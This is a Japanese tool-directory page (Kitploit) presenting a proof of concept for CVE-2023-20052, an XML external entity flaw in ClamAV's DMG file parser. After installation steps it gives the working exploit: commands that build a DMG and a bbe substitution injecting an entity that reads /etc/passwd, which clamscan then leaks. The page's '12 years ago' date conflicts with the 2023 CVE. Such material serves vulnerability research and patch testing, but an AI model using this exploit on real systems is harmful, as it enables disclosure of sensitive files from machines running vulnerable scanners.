Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-20052 — CVE-2023-20052 ClamAV の DMG ファイルパーサーにおける情報漏えいの脆弱性 | Kitploit
ツール/GitHubGitHub/cy83rr0h1t/cve-2023-20052
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集マルウェア分析
GitHubcy83rr0h1t/cve-2023-20052

CVE-2023-20052

CVE-2023-20052 ClamAV の DMG ファイルパーサーにおける情報漏えいの脆弱性

リポジトリを見る
12年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-20052

ClamAV の DMG ファイルパーサーにおける CVE-2023-20052 情報漏えいの脆弱性
ClamAV 1.0.0 以前、0.105.1 以前、および 0.103.7 以前の DMG ファイルパーサーの脆弱性により、未認証のリモート攻撃者が影響を受けるデバイス上の機密情報にアクセスできる可能性があります。この脆弱性は、XML 外部エンティティインジェクションを引き起こす可能性がある XML エンティティ置換が有効になっていることが原因です。攻撃者は、影響を受けるデバイス上の ClamAV でスキャンされるように細工された DMG ファイルを送信することで、この脆弱性を悪用する可能性があります。悪用に成功すると、攻撃者は ClamAV のスキャンプロセスが読み取り可能な任意のファイルからバイト列を漏えいさせることができる可能性があります。

Ubuntu 20.04 でテスト済み

ClamAV バージョン 1.0.0 のインストール方法

  • https://github.com/Cisco-Talos/clamav/releases/download/clamav-1.0.0/clamav-1.0.0.linux.i686.deb
  • https://github.com/Cisco-Talos/clamav/releases/download/clamav-1.0.0/clamav-1.0.0.linux.x86_64.deb

sudo dpkg -i package-name.deb
1

  • sudo apt install -f

  • mkdir /usr/local/share/clamav

  • mv /usr/local/etc/freshclam.conf.sample /usr/local/etc/freshclam.conf
    2

  • sudo adduser clamav
    3

  • sudo chown -R 1002:1003 /usr/local/share/clamav

  • sudo freshclam
    4

5

  • clamscan --version
    6

このエクスプロイトに必要な追加のツールをインストールします。

  • apt-get update

  • apt-get install -y ca-certificates gnupg wget

  • echo "deb http://archive.debian.org/debian-security stretch/updates main" >> /etc/apt/sources.list

  • wget -q -O - https://ftp-master.debian.org/keys/archive-key-9-security.asc | apt-key add -

  • apt-get update -y

  • sudo apt install -y libssl1.0-dev gcc g++ cmake zlib1g-dev genisoimage bbe git hfsplus
    7

  • git clone https://github.com/planetbeing/libdmg-hfsplus.git
    8

  • cd /libdmg-hfsplus

  • cmake .
    9

  • make
    10

  • cp dmg/dmg /bin
    sudo genisoimage -D -V "exploit" -no-pad -r -apple -file-mode 0777 -o test.img . && dmg dmg test.img test.dmg
    11

bbe -e 's|<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">|<!DOCTYPE plist [<!ENTITY xxe SYSTEM "/etc/passwd"> ]>|' -e 's/blkx/&xxe\;/' test.dmg -o exploit2.dmg 12

  • clamscan --debug exploit2.dmg 13

参照: https://github.com/nokn0wthing/CVE-2023-20052

ツールをダウンロード